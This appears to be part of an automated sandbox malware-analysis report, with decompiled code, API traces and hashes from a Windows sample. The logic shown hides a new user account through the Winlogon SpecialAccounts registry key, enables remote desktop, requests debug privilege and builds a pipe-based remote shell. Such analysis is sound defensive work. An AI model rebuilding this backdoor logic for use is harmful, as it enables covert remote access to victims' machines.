FindResourceW.KERNEL32(00000000,00000067,WM_FIND,00000000), ref: 0041072B
LoadResource.KERNEL32(00000000,00000000), ref: 00410735
SizeofResource.KERNEL32(00000000,00000000), ref: 0041073F
LockResource.KERNEL32(00000000), ref: 00410749
GetTempPathA.KERNEL32(00000400,?), ref: 00410785
lstrcatA.KERNEL32(?,find.exe), ref: 00410799
GetTempPathA.KERNEL32(00000400,?), ref: 004107A7
lstrcatA.KERNEL32(?,find.db), ref: 004107B5
CreateFileA.KERNEL32(?,10000000,00000001,00000000,00000002,00000084,00000000), ref: 004107D0
WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 004107E2
CloseHandle.KERNEL32(00000000), ref: 004107E9
wsprintfA.USER32 ref: 00410819
ShellExecuteExA.SHELL32(0000003C), ref: 00410867

Strings

@, xrefs: 00410838
find.exe, xrefs: 00410793
-w %ws -d C -f %s, xrefs: 00410813
find.db, xrefs: 004107A9
WM_FIND, xrefs: 00410721
<, xrefs: 00410825

Memory Dump Source

Source File: 00000008.00000002.1165804046.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gnwnekc.jbxd

Yara matches

Similarity

API ID: Resource$FilePathTemplstrcat$CloseCreateExecuteFindFreeHandleLoadLockShellSizeofVirtualWritelstrcpywsprintf
String ID: -w %ws -d C -f %s$<$@$WM_FIND$find.db$find.exe
API String ID: 2851928664-3107137372
Opcode ID: 9eb1e37cb9858bab341310001c5df4c3ab4ed1bb1bc9db4cade85268520256ef
Instruction ID: 6e1240cbf3f4a79992a8638cb1fd4ac0d6d497e1373cd80395e89e7c5db35027
Opcode Fuzzy Hash: 9eb1e37cb9858bab341310001c5df4c3ab4ed1bb1bc9db4cade85268520256ef
Instruction Fuzzy Hash: C5414AB1900219BBDB10DFA1DD85FDEBBBCEF89304F104166F609E2151DAB49A418BA8

Uniqueness

Uniqueness Score: -1.00%

Function 0040C442 Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 237
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040C442(void* __edx, char _a4, char _a8) {
				void* _v12;
				char _v16;
				int _v20;
				char _v36;
				void _v44;
				void* _t51;
				int _t56;
				int _t70;
				void* _t104;
				signed int _t115;
				void* _t161;
				void* _t162;
				void* _t163;
				int _t172;

				_t161 = __edx;
				InitializeCriticalSection( &_v44);
				_t115 = 6;
				DeleteCriticalSection(memcpy(0x417cc8,  &_v44, _t115 << 2));
				EnterCriticalSection(0x417cc8);
				_t167 = _a4;
				_t111 = _a8;
				 *0x417d28 = _a4;
				 *0x417d1c = 0x416cd0;
				 *0x417d18 = _a8;
				if(E0040BF64(_t161) == 0) {
					_t51 = E0040D279();
					__eflags = _t51 - 6;
					if(_t51 < 6) {
						L14:
						E00404A3D(_t167, E004046DA( &_v36, 2, 0x417d20, 0x417d24));
						E004046B7( &_v36);
						LeaveCriticalSection(0x417cc8);
						__eflags = 0;
						return 0;
					}
					_t56 = E0040D22A();
					__eflags = _t56;
					if(_t56 != 0) {
						goto L14;
					}
					__eflags = E0040D724() - 1;
					if(__eflags == 0) {
						_t162 = 8;
						E004031FD(0x417d20, E0040326D( &_a4, _t162, __eflags));
						E004058FB(_a4);
						_t163 = 8;
						E004031FD(0x417d24, E0040326D( &_a4, _t163, __eflags));
						E004058FB(_a4);
						_t172 = 0;
						RegCreateKeyExA(0x80000002, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList", 0, 0, 0, 0xf013f, 0,  &_v12,  &_v20);
						_v16 = 0;
						RegSetValueExW(_v12,  *0x417d20, 0, 4,  &_v16, 4);
						RegCloseKey(_v12);
						_t70 = E0040B55D(0x417d20, 0x417d24);
						__eflags = _t70;
						if(_t70 != 0) {
							E0040EF5F(_a8, _t163, E004033AB( &_a4, L"rudp"), 0x417d20);
							E004058FB(_a4);
							E0040EF5F(_a8, _t163, E004033AB( &_a8, L"rpdp"), 0x417d24);
							E004058FB(_a8);
							E00401E8E(0x417ce0, E0040C340, 0x417cc8);
							LeaveCriticalSection(0x417cc8);
							return 1;
						}
						E00404A3D(_t167, E004046DA( &_v36, 9, 0x417d20, 0x417d24));
						E004046B7( &_v36);
						L12:
						LeaveCriticalSection(0x417cc8);
						return _t172;
					}
					E00404A3D(_t167, E004046DA( &_v36, 1, 0x417d20, 0x417d24));
					E004046B7( &_v36);
					_t172 = 0;
					goto L12;
				}
				E004031FD(0x417d20, E0040EF92(_t111, _t161,  &_a8, E004033AB( &_a4, L"rudp")));
				E004058FB(_a8);
				_a8 = 0;
				E004058FB(_a4);
				E004031FD(0x417d24, E0040EF92(_t111, _t161,  &_a8, E004033AB( &_a4, L"rpdp")));
				E004058FB(_a8);
				_a8 = 0;
				E004058FB(_a4);
				if(E00403027(0x417d20) != 0 || E00403027(0x417d24) != 0) {
					E00404A3D(_t167, E004046DA( &_v36, 8, 0x417d20, 0x417d24));
					E004046B7( &_v36);
				} else {
					_t104 = E004033AB( &_a4, 0x412428);
					E00404A3D(_t167, E004046DA( &_v36, 8, E004033AB( &_a8, 0x412428), _t104));
					E004046B7( &_v36);
					E004058FB(_a8);
					_a8 = 0;
					E004058FB(_a4);
				}
				_t172 = 1;
				goto L12;
			}

0x0040c442
0x0040c44f
0x0040c457
0x0040c466
0x0040c472
0x0040c478
0x0040c47b
0x0040c47e
0x0040c484
0x0040c48e
0x0040c49b
0x0040c59c
0x0040c5a1
0x0040c5a4
0x0040c717
0x0040c72e
0x0040c736
0x0040c73c
0x0040c742
0x00000000
0x0040c742
0x0040c5aa
0x0040c5af
0x0040c5b1
0x00000000
0x00000000
0x0040c5bc
0x0040c5bf
0x0040c5ee
0x0040c5fd
0x0040c605
0x0040c60c
0x0040c61d
0x0040c625
0x0040c62d
0x0040c647
0x0040c652
0x0040c662
0x0040c66b
0x0040c677
0x0040c67c
0x0040c67e
0x0040c6cb
0x0040c6d3
0x0040c6e9
0x0040c6f1
0x0040c706
0x0040c70c
0x00000000
0x0040c714
0x0040c693
0x0040c69b
0x0040c6a0
0x0040c6a6
0x00000000
0x0040c6ac
0x0040c5d8
0x0040c5e0
0x0040c5e5
0x00000000
0x0040c5e5
0x0040c4c0
0x0040c4c8
0x0040c4d2
0x0040c4d5
0x0040c4fb
0x0040c503
0x0040c50b
0x0040c50e
0x0040c51f
0x0040c587
0x0040c58f
0x0040c52c
0x0040c535
0x0040c552
0x0040c55a
0x0040c562
0x0040c56a
0x0040c56d
0x0040c56d
0x0040c596
0x00000000

APIs

InitializeCriticalSection.KERNEL32(?,?,?), ref: 0040C44F
DeleteCriticalSection.KERNEL32(?,?,?), ref: 0040C466
EnterCriticalSection.KERNEL32(00417CC8,?,?), ref: 0040C472

Part of subcall function 0040BF64: RegOpenKeyExW.ADVAPI32 ref: 0040BF96

RegCreateKeyExA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList,00000000,00000000,00000000,000F013F,00000000,?,?), ref: 0040C647
RegSetValueExW.ADVAPI32 ref: 0040C662
RegCloseKey.ADVAPI32(?), ref: 0040C66B
LeaveCriticalSection.KERNEL32(00417CC8,00000000,00417D20,00417D24,?,?), ref: 0040C6A6

Part of subcall function 004033AB: lstrlenW.KERNEL32(0040F5B0,00000000,?,0040F5B0,00000000,?,00000000), ref: 004033B4
Part of subcall function 004033AB: lstrlenW.KERNEL32(0040F5B0,?,0040F5B0,00000000,?,00000000), ref: 004033CB
Part of subcall function 004033AB: lstrcpyW.KERNEL32(?,0040F5B0), ref: 004033E6

Part of subcall function 004031FD: lstrcpyW.KERNEL32(00000000,00000000), ref: 00403222

Part of subcall function 004058FB: VirtualFree.KERNELBASE(00000000,00000000,00008000,0040DE38,?,?,?,?,?,00000000), ref: 00405903

Part of subcall function 00403027: lstrlenW.KERNEL32(?,0040340C,?,?,?,0040EE0E,?,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,?,?,?,00000000), ref: 0040302E

LeaveCriticalSection.KERNEL32(00417CC8,00000000,rpdp,00417D24,00000000,rudp,00417D20,00417D20,00417D24,?,?), ref: 0040C70C
LeaveCriticalSection.KERNEL32(00417CC8,00000000,?,?), ref: 0040C73C

Strings

SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList, xrefs: 0040C63D
rpdp, xrefs: 0040C4DA, 0040C6D9
rudp, xrefs: 0040C4A1, 0040C6B8

Memory Dump Source

Source File: 00000008.00000002.1165804046.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gnwnekc.jbxd

Yara matches

Similarity

API ID: CriticalSection$Leavelstrlen$lstrcpy$CloseCreateDeleteEnterFreeInitializeOpenValueVirtual
String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList$rpdp$rudp
API String ID: 2046459734-177601018
Opcode ID: b52cdbca299196601e6eb064cad596b6f475cf98fcca56eec00eaf2c038a896e
Instruction ID: 134793a7356a7ec53501799a6182d928eec22be218d892ca06c187ad0c48d641
Opcode Fuzzy Hash: b52cdbca299196601e6eb064cad596b6f475cf98fcca56eec00eaf2c038a896e
Instruction Fuzzy Hash: 5E716F71600108BADB04FF61DC969EE3B69EF48359B00843BBA06B62D1DF7C5A46CB5C

Uniqueness

Uniqueness Score: -1.00%

Function 0040CAF0 Relevance: 19.6, APIs: 13, Instructions: 135
pipethreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040CAF0(void* __eflags, char _a4) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				struct _SECURITY_ATTRIBUTES _v36;
				void* _t54;
				void* _t61;
				void* _t64;
				int _t66;
				void* _t76;
				int _t94;
				void* _t95;

				E0040CA7E(0x416578);
				_v12 = _v12 & 0x00000000;
				_v16 = _v16 & 0x00000000;
				_v8 = _v8 & 0x00000000;
				_t94 = 1;
				_v20 = _v20 & 0x00000000;
				_v24 = _v24 & 0x00000000;
				_v36.lpSecurityDescriptor = _v36.lpSecurityDescriptor & 0x00000000;
				_v36.nLength = 0xc;
				_v36.bInheritHandle = 1;
				if(CreatePipe( &_v12,  &_v8,  &_v36, 0) == 0) {
					L7:
					E0040CC81( &_v12);
					E0040CC81( &_v8);
					E0040CC81( &_v16);
					E0040CC81( &_v20);
					E0040CC81( &_v24);
					E0040CA7E(0x416578);
					_t94 = 0;
				} else {
					_t54 = GetCurrentProcess();
					if(DuplicateHandle(GetCurrentProcess(), _v8, _t54,  &_v16, 0, 1, 2) == 0 || CreatePipe( &_v24,  &_v20,  &_v36, 0) == 0) {
						goto L7;
					} else {
						_t61 = GetCurrentProcess();
						if(DuplicateHandle(GetCurrentProcess(), _v12, _t61, 0x416580, 0, 0, 2) == 0) {
							goto L7;
						} else {
							_t64 = GetCurrentProcess();
							_t66 = DuplicateHandle(GetCurrentProcess(), _v20, _t64, 0x416584, 0, 0, 2);
							_t101 = _t66;
							if(_t66 == 0) {
								goto L7;
							} else {
								E0040CC81( &_v12);
								E0040CC81( &_v20);
								E004033F3(_t95,  &_a4);
								if(E0040C88E(_t95, _t101,  &_v20, _v8, _v24, _v16) == 0) {
									goto L7;
								} else {
									E0040CC81( &_v8);
									E0040CC81( &_v24);
									E0040CC81( &_v16);
									 *0x416588 = CreateEventA(0, 1, 0, 0);
									_t76 = CreateThread(0, 0, E0040C927, 0x416578, 0, 0x416590);
									 *0x41658c = _t76;
									if(_t76 == 0) {
										goto L7;
									}
								}
							}
						}
					}
				}
				E004058FB(_a4);
				return _t94;
			}

0x0040cafe
0x0040cb03
0x0040cb0a
0x0040cb10
0x0040cb14
0x0040cb15
0x0040cb19
0x0040cb1d
0x0040cb27
0x0040cb32
0x0040cb3e
0x0040cc3c
0x0040cc3f
0x0040cc47
0x0040cc4f
0x0040cc57
0x0040cc5f
0x0040cc69
0x0040cc6e
0x0040cb44
0x0040cb53
0x0040cb66
0x00000000
0x0040cb88
0x0040cb93
0x0040cba0
0x00000000
0x0040cba6
0x0040cbb1
0x0040cbba
0x0040cbbc
0x0040cbbe
0x00000000
0x0040cbc0
0x0040cbc3
0x0040cbcb
0x0040cbe0
0x0040cbec
0x00000000
0x0040cbee
0x0040cbf1
0x0040cbf9
0x0040cc01
0x0040cc28
0x0040cc2d
0x0040cc33
0x0040cc3a
0x00000000
0x00000000
0x0040cc3a
0x0040cbec
0x0040cbbe
0x0040cba0
0x0040cb66
0x0040cc73
0x0040cc7e

APIs

Part of subcall function 0040CA7E: GetCurrentThreadId.KERNEL32(?,00000000,00402904,00000000,exit,00000000,start), ref: 0040CA8A
Part of subcall function 0040CA7E: SetEvent.KERNEL32(00000000), ref: 0040CA9E
Part of subcall function 0040CA7E: WaitForSingleObject.KERNEL32(0041658C,00001388), ref: 0040CAAB
Part of subcall function 0040CA7E: TerminateThread.KERNEL32(0041658C,000000FE), ref: 0040CABC

CreatePipe.KERNEL32(00000000,00000000,?,00000000,?,?,00000000), ref: 0040CB36
GetCurrentProcess.KERNEL32(00000000,00000000,00000001,00000002,?,00000000), ref: 0040CB53
GetCurrentProcess.KERNEL32(00000000,00000000,?,00000000), ref: 0040CB59
DuplicateHandle.KERNEL32 ref: 0040CB62
CreatePipe.KERNEL32(00000000,00000000,0000000C,00000000,?,00000000), ref: 0040CB7A
GetCurrentProcess.KERNEL32(00416580,00000000,00000000,00000002,?,00000000), ref: 0040CB93
GetCurrentProcess.KERNEL32(00000000,00000000,?,00000000), ref: 0040CB99
DuplicateHandle.KERNEL32 ref: 0040CB9C
GetCurrentProcess.KERNEL32(00416584,00000000,00000000,00000002,?,00000000), ref: 0040CBB1
GetCurrentProcess.KERNEL32(00000000,00000000,?,00000000), ref: 0040CBB7
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040CC0D
CreateThread.KERNEL32(00000000,00000000,0040C927,00416578,00000000,00416590), ref: 0040CC2D
DuplicateHandle.KERNEL32 ref: 0040CBBA

Part of subcall function 0040CC81: CloseHandle.KERNEL32(00416588), ref: 0040CC8B

Part of subcall function 004033F3: lstrcpyW.KERNEL32(00000000,?), ref: 0040341D

Part of subcall function 0040C88E: CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000001,00000010,00000000,00000000,?,00000000), ref: 0040C8E0

Memory Dump Source

Source File: 00000008.00000002.1165804046.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gnwnekc.jbxd

Yara matches

Similarity

API ID: CurrentProcess$Create$Handle$DuplicateThread$EventPipe$CloseObjectSingleTerminateWaitlstrcpy
String ID:
API String ID: 337272696-0
Opcode ID: 72700d1d587d8365f7efa78f55491a447b89c2c899ef13fa7bd130b36919d69e
Instruction ID: cfbdd5b7a17737b0ed7d5eecf7ec0e2bbc46d3a328e85f31f6445c0037f4dca5
Opcode Fuzzy Hash: 72700d1d587d8365f7efa78f55491a447b89c2c899ef13fa7bd130b36919d69e
Instruction Fuzzy Hash: 22415F71A40209FAEB10EBA1DD96FEF7B78EF14745F10423AB504B20D1DB789A05DA68

Uniqueness

Uniqueness Score: -1.00%

Function 0040B6D2 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 71
serviceCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040B6D2(struct _QUERY_SERVICE_CONFIG* _a4) {
				int _v8;
				void* __ecx;
				void* _t10;
				void* _t26;
				struct _QUERY_SERVICE_CONFIG* _t34;
				void* _t37;

				_v8 = 0;
				_t10 = OpenSCManagerW(0, L"ServicesActive", 1);
				_t37 = _t10;
				if(_t37 != 0) {
					_t26 = OpenServiceW(_t37,  *_a4, 1);
					if(_t26 != 0) {
						if(QueryServiceConfigW(_t26, 0, 0,  &_v8) != 0 || GetLastError() == 0x7a) {
							_t34 = E00405955(_v8);
							_a4 = _t34;
							if(QueryServiceConfigW(_t26, _t34, _v8,  &_v8) != 0) {
								CloseServiceHandle(_t37);
								CloseServiceHandle(_t26);
								E004010C1(_a4);
								_t10 =  *(_t34 + 4);
							} else {
								goto L6;
							}
						} else {
							L6:
							CloseServiceHandle(_t37);
							CloseServiceHandle(_t26);
							goto L7;
						}
					} else {
						CloseServiceHandle(_t37);
						L7:
						_t10 = 0;
					}
				}
				return _t10;
			}

0x0040b6e2
0x0040b6e5
0x0040b6eb
0x0040b6ef
0x0040b704
0x0040b708
0x0040b722
0x0040b737
0x0040b740
0x0040b74d
0x0040b769
0x0040b76c
0x0040b771
0x0040b777
0x00000000
0x00000000
0x00000000
0x0040b74f
0x0040b74f
0x0040b756
0x0040b759
0x00000000
0x0040b759
0x0040b70a
0x0040b70b
0x0040b75b
0x0040b75b
0x0040b75b
0x0040b779
0x0040b77d

APIs

OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000001), ref: 0040B6E5
OpenServiceW.ADVAPI32(00000000,?,00000001), ref: 0040B6FE
CloseServiceHandle.ADVAPI32(00000000), ref: 0040B70B
QueryServiceConfigW.ADVAPI32(00000000,00000000,00000000,?), ref: 0040B71A
GetLastError.KERNEL32 ref: 0040B724
QueryServiceConfigW.ADVAPI32(00000000,00000000,?,?), ref: 0040B745
CloseServiceHandle.ADVAPI32(00000000), ref: 0040B756
CloseServiceHandle.ADVAPI32(00000000), ref: 0040B759
CloseServiceHandle.ADVAPI32(00000000), ref: 0040B769
CloseServiceHandle.ADVAPI32(00000000), ref: 0040B76C

Part of subcall function 004010C1: GetProcessHeap.KERNEL32(00000000,00000000,004032DA,00000000,00000000,?,?,?,00000000), ref: 004010C7
Part of subcall function 004010C1: HeapFree.KERNEL32(00000000,?,?), ref: 004010CE

Strings

ServicesActive, xrefs: 0040B6DC

Memory Dump Source

Source File: 00000008.00000002.1165804046.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gnwnekc.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$ConfigHeapOpenQuery$ErrorFreeLastManagerProcess
String ID: ServicesActive
API String ID: 1929760286-3071072050
Opcode ID: 443a1f3935aeb02ab1ccaa1c10e119e32b48cad48cedba6c2e9887a8f7b8281f
Instruction ID: 038347b86dbf485e1479e30cf8f14de8664463b01bc04e0eaa051b469d69834d
Opcode Fuzzy Hash: 443a1f3935aeb02ab1ccaa1c10e119e32b48cad48cedba6c2e9887a8f7b8281f
Instruction Fuzzy Hash: 76117F71600214FBD7209F62DD88D9B7F6DEB853907108136FA05E7250DBB49E10CBAC

Uniqueness

Uniqueness Score: -1.00%

Function 0040C017 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 259
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E0040C017(struct _CRITICAL_SECTION* __ecx, void* __edx) {
				char _v28;
				char _v32;
				char _v36;
				char _v48;
				char _v52;
				char _v56;
				signed int _v60;
				char _v64;
				char _v68;
				intOrPtr _v76;
				int _t75;
				int _t76;
				int _t79;
				int _t80;
				void* _t82;
				void* _t83;
				int _t84;
				int _t86;
				int _t87;
				int _t93;
				void* _t94;
				int _t132;
				void* _t142;
				char* _t143;
				signed int _t154;
				char* _t184;
				intOrPtr _t193;
				char* _t196;
				void* _t199;
				struct _CRITICAL_SECTION* _t202;
				signed int _t211;
				signed int _t213;
				void* _t215;

				_t199 = __edx;
				_t156 = __ecx;
				_t215 = (_t213 & 0xfffffff8) - 0x34;
				_t202 = __ecx;
				_t154 = 0;
				_v36 = 0;
				_v32 = 0;
				_v56 = 0;
				EnterCriticalSection(__ecx);
				if(E0040D780(_t156) == 1) {
					_t156 =  &_v56;
					E0040D39C( &_v56);
				}
				_t205 = _t202 + 0x38;
				_t75 = PathFileExistsW( *(_t202 + 0x38));
				_t217 = _t75;
				if(_t75 != 0) {
					L11:
					_t206 = _t202 + 0x3c;
					_t76 = PathFileExistsW( *(_t202 + 0x3c));
					__eflags = _t76;
					if(_t76 != 0) {
						L17:
						E0040BDF7(_t202, _t199);
						E0040BDDE(_t202);
						_t159 = _t202;
						_t79 = E0040BBA0(_t202);
						__eflags = _t79;
						if(_t79 != 0) {
							_t160 = _t202;
							_t80 = E0040BAFB(_t202, _t199, _t159);
							__eflags = _t80;
							if(_t80 != 0) {
								E0040BD7B(_t160);
								_t82 = E004033AB( &_v52, L"SeDebugPrivilege");
								_t83 = GetCurrentProcess();
								_t200 = _t82;
								_t84 = E0040D3CA(_t83, _t82);
								E004058FB(_v56);
								__eflags = _t84;
								if(_t84 != 0) {
									_t164 =  *(_t202 + 0x2c);
									_t86 = E0040E7E1( *(_t202 + 0x2c));
									__eflags = _t86;
									if(_t86 != 0) {
										Sleep(0x3e8);
										_t87 =  *(_t202 + 0x48);
										__eflags = _t87;
										if(_t87 != 0) {
											_t211 = _t154;
											__eflags = _t211 - _t87;
											do {
												E004056F9(_t164 & 0xffffff00 | __eflags > 0x00000000);
												E004033F3( &_v52,  *((intOrPtr*)(_t202 + 0x40)) + _t211 * 4);
												E0040B64D( &_v56);
												_t164 = _v60;
												E004058FB(_v60);
												_t211 = _t211 + 1;
												_v60 = _t154;
												__eflags = _t211 -  *(_t202 + 0x48);
											} while (_t211 <  *(_t202 + 0x48));
										}
										Sleep(0x1f4);
										E004033F3( &_v52, _t202 + 0x28);
										E0040B64D( &_v56);
										_t166 = _v60;
										E004058FB(_v60);
										Sleep(0x1f4);
										_t93 = E0040B780(_t200, __eflags, _v60);
										__eflags = _t93;
										if(_t93 != 0) {
											_t94 = E0040D780(_t166);
											__eflags = _t94 - 1;
											if(_t94 == 1) {
												E0040D375(_v56);
											}
											E00404A3D( *((intOrPtr*)(_t202 + 0x60)), E004046DA( &_v52, _t154, _t202 + 0x58, _t202 + 0x5c));
											E004046B7( &_v68);
											LeaveCriticalSection(_t202);
											_t154 = 8;
										} else {
											_push(_t202 + 0x5c);
											_push(_t202 + 0x58);
											_push(7);
											goto L31;
										}
									} else {
										E0040D375(_v56);
										_push(_t202 + 0x5c);
										_push(_t202 + 0x58);
										_push(5);
										goto L31;
									}
								} else {
									E0040D375(_v56);
									_push(_t202 + 0x5c);
									_push(_t202 + 0x58);
									_push(3);
									goto L31;
								}
							} else {
								E0040D375(_v56);
								_push(_t202 + 0x5c);
								_push(_t202 + 0x58);
								_push(6);
								goto L31;
							}
						} else {
							E0040D375(_v56);
							_push(_t202 + 0x5c);
							_push(_t202 + 0x58);
							_push(4);
							L31:
							E00404A3D( *((intOrPtr*)(_t202 + 0x60)), E004046DA( &_v52));
							E004046B7( &_v68);
							LeaveCriticalSection(_t202);
						}
					} else {
						E004033F3(_t215, _t206);
						E0040DD2B( &_v32, __eflags, _t156, _t154);
						_t183 =  *((intOrPtr*)(_t202 + 0x54));
						E00410CE2( *((intOrPtr*)(_t202 + 0x54)), _t199,  &_v64,  *((intOrPtr*)(_t202 + 0x60)), 3);
						__eflags = _v76 - _t154;
						if(_v76 != _t154) {
							_t184 =  &_v28;
							_t132 = E0040D918(_t184, _t183, _t183);
							__eflags = _t132;
							if(_t132 != 0) {
								_push(_t184);
								E0040DC65( &_v28,  &_v52);
								E0040DC4D( &_v36);
							}
							E00402DFF( &_v52);
							E0040DA15( &_v28, __eflags);
							goto L17;
						} else {
							E00402DFF( &_v52);
							goto L7;
						}
					}
				} else {
					E004033F3(_t215, _t205);
					E0040DD2B( &_v32, _t217, _t156, _t154);
					_t142 = E0040D780( &_v32);
					_t193 =  *((intOrPtr*)(_t202 + 0x54));
					_t143 =  &_v64;
					if(_t142 != 1) {
						_push(1);
					} else {
						_push(2);
					}
					_push( *((intOrPtr*)(_t202 + 0x60)));
					_push(_t143);
					E00402C65( &_v48, E00410CE2(_t193, _t199));
					_t195 =  &_v68;
					E00402DFF( &_v68);
					_t219 = _v52 - _t154;
					if(_v52 != _t154) {
						_t196 =  &_v28;
						__eflags = E0040D918(_t196,  &_v68, _t195);
						if(__eflags != 0) {
							_push(_t196);
							E0040DC65( &_v28,  &_v36);
							E0040DC4D( &_v36);
						}
						_t156 =  &_v28;
						E0040DA15( &_v28, __eflags);
						goto L11;
					} else {
						L7:
						E0040DA15( &_v28, _t219);
						_t154 = _t154 | 0xffffffff;
					}
				}
				E00402DFF( &_v36);
				return _t154;
			}

0x0040c017
0x0040c017
0x0040c01d
0x0040c023
0x0040c025
0x0040c028
0x0040c02c
0x0040c030
0x0040c034
0x0040c042
0x0040c044
0x0040c048
0x0040c048
0x0040c04d
0x0040c052
0x0040c058
0x0040c05a
0x0040c0ed
0x0040c0ed
0x0040c0f2
0x0040c0f8
0x0040c0fa
0x0040c16e
0x0040c170
0x0040c177
0x0040c17c
0x0040c17e
0x0040c183
0x0040c185
0x0040c1a0
0x0040c1a2
0x0040c1a7
0x0040c1a9
0x0040c1c3
0x0040c1d1
0x0040c1d8
0x0040c1de
0x0040c1e2
0x0040c1ed
0x0040c1f2
0x0040c1f4
0x0040c20e
0x0040c211
0x0040c216
0x0040c218
0x0040c23d
0x0040c23f
0x0040c242
0x0040c244
0x0040c246
0x0040c248
0x0040c24a
0x0040c24d
0x0040c25d
0x0040c267
0x0040c26c
0x0040c270
0x0040c278
0x0040c279
0x0040c27d
0x0040c27d
0x0040c281
0x0040c28c
0x0040c296
0x0040c2a0
0x0040c2a5
0x0040c2a9
0x0040c2b3
0x0040c2b6
0x0040c2bb
0x0040c2bd
0x0040c2ed
0x0040c2f2
0x0040c2f5
0x0040c2fb
0x0040c2fb
0x0040c316
0x0040c31f
0x0040c325
0x0040c32d
0x0040c2bf
0x0040c2c2
0x0040c2c6
0x0040c2c7
0x00000000
0x0040c2c7
0x0040c21a
0x0040c21e
0x0040c226
0x0040c22a
0x0040c22b
0x00000000
0x0040c22b
0x0040c1f6
0x0040c1fa
0x0040c202
0x0040c206
0x0040c207
0x00000000
0x0040c207
0x0040c1ab
0x0040c1af
0x0040c1b7
0x0040c1bb
0x0040c1bc
0x00000000
0x0040c1bc
0x0040c187
0x0040c18b
0x0040c193
0x0040c197
0x0040c198
0x0040c2c9
0x0040c2d6
0x0040c2df
0x0040c2e5
0x0040c2e5
0x0040c0fc
0x0040c101
0x0040c10a
0x0040c10f
0x0040c11c
0x0040c121
0x0040c125
0x0040c137
0x0040c13b
0x0040c140
0x0040c142
0x0040c144
0x0040c14e
0x0040c157
0x0040c157
0x0040c160
0x0040c169
0x00000000
0x0040c127
0x0040c12b
0x00000000
0x0040c12b
0x0040c125
0x0040c060
0x0040c065
0x0040c06e
0x0040c073
0x0040c078
0x0040c07e
0x0040c082
0x0040c088
0x0040c084
0x0040c084
0x0040c084
0x0040c08a
0x0040c08d
0x0040c098
0x0040c09d
0x0040c0a1
0x0040c0a6
0x0040c0aa
0x0040c0bf
0x0040c0c8
0x0040c0ca
0x0040c0cc
0x0040c0d6
0x0040c0df
0x0040c0df
0x0040c0e4
0x0040c0e8
0x00000000
0x0040c0ac
0x0040c0ac
0x0040c0b0
0x0040c0b5
0x0040c0b5
0x0040c0aa
0x0040c332
0x0040c33f

APIs

EnterCriticalSection.KERNEL32 ref: 0040C034

Part of subcall function 0040D780: GetCurrentProcess.KERNEL32(?,?,00402B66,?,00412428,?,?), ref: 0040D784

PathFileExistsW.SHLWAPI(?), ref: 0040C0F2
PathFileExistsW.SHLWAPI(?), ref: 0040C052

Part of subcall function 0040D918: CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000001,00000000,00000000), ref: 0040D92F
Part of subcall function 0040D918: GetLastError.KERNEL32(?,?,?,00408590,?,?,?), ref: 0040D93D

LeaveCriticalSection.KERNEL32(?,00000000), ref: 0040C2E5

Part of subcall function 0040BAFB: RegOpenKeyExW.ADVAPI32 ref: 0040BB2F

GetCurrentProcess.KERNEL32(SeDebugPrivilege), ref: 0040C1D8
LeaveCriticalSection.KERNEL32(?,00000000), ref: 0040C325

Strings

SeDebugPrivilege, xrefs: 0040C1C8

Memory Dump Source

Source File: 00000008.00000002.1165804046.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gnwnekc.jbxd

Yara matches

Similarity

API ID: CriticalFileSection$CurrentExistsLeavePathProcess$CreateEnterErrorLastOpen
String ID: SeDebugPrivilege
API String ID: 1717069549-2896544425
Opcode ID: 9d95510fd3a69620aa4185021c429ef206859b341bb8ce3e58d3dd84583424a9
Instruction ID: 5877a61cdd06f7866b0ac8815eceb181e086673125db960341a94c968825164e
Opcode Fuzzy Hash: 9d95510fd3a69620aa4185021c429ef206859b341bb8ce3e58d3dd84583424a9
Instruction Fuzzy Hash: 49913171514605EBC714FBA2C8919AF73A8BF84308F404A3FF552A35D1DB78E909CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 0040BDF7 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 111
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040BDF7(void* __ecx, void* __edx) {
				void* _v8;
				WCHAR* _v12;
				signed int _v16;
				short* _v20;
				short* _v24;
				char _v28;
				int _v32;
				char _v36;
				void* _t50;
				void* _t62;
				void* _t72;
				void* _t96;

				_t96 = __edx;
				_t72 = __ecx;
				_v8 = 0;
				E004033AB( &_v24, L"SYSTEM\\CurrentControlSet\\Services\\TermService");
				E004033AB( &_v20, L"SYSTEM\\CurrentControlSet\\Services\\TermService\\Parameters");
				_v36 = 0;
				_v32 = 0;
